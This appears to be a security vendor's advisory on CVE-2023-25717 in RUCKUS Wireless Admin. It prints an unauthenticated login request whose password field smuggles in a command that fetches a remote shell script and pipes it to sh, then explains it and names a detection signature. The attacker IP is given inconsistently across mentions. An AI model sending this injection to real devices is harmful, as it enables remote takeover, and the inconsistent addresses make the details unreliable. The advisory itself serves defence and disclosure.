Ruckus Wireless Remote Code Execution Vulnerability
RUCKUS Networks designs, sells and services IT networking products, such as switches, WLAN controllers, Access points, IoT gateways and software. RUCKUS started as wireless only company selling to Internet Service Providers(ISP), Hotel chains, large public venues and later extended to education.
RUCKUS Wireless Admin Remote Code Execution Vulnerability | CVE-2023-25717
RUCKUS Wireless Admin through 10.4 allows Remote Code Execution via an unauthenticated HTTP GET Request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring.
Let’s break down what the attacker is trying to do.
- login_username=admin: This parameter sets the username to “admin” for the login attempt.
- password=admin$(curl%20http:// 220.127.116.11/ruckus.sh%20|%20sh: This parameter sets the password for the login attempt. This part of the code is particularly interesting because it includes a command injection attempt.
- $(curl%20http:// 18.104.22.168/ruckus.sh%20|%20sh
This part is attempting a command injection by using the $() syntax to execute a command within the password field. The command being executed is:
- curl http://22.214.171.124/ruckus.sh | sh
This command is retrieving a shell script (ruckus.sh) from a remote server (at IP address 126.96.36.199) and piping its contents to the sh command, which would effectively run the script’s commands.
In summary, if this code is successfully executed within the context of a vulnerable system that allows command injection, it could potentially retrieve and execute a shell script from the specified remote server. This can lead to unauthorized access, data breaches, and other malicious actions.
SonicWall Capture Labs provides protection against this threat via the following signature:
- IPS 15864:Ruckus Wireless Admin RCE
RUCKUS has patched this vulnerability.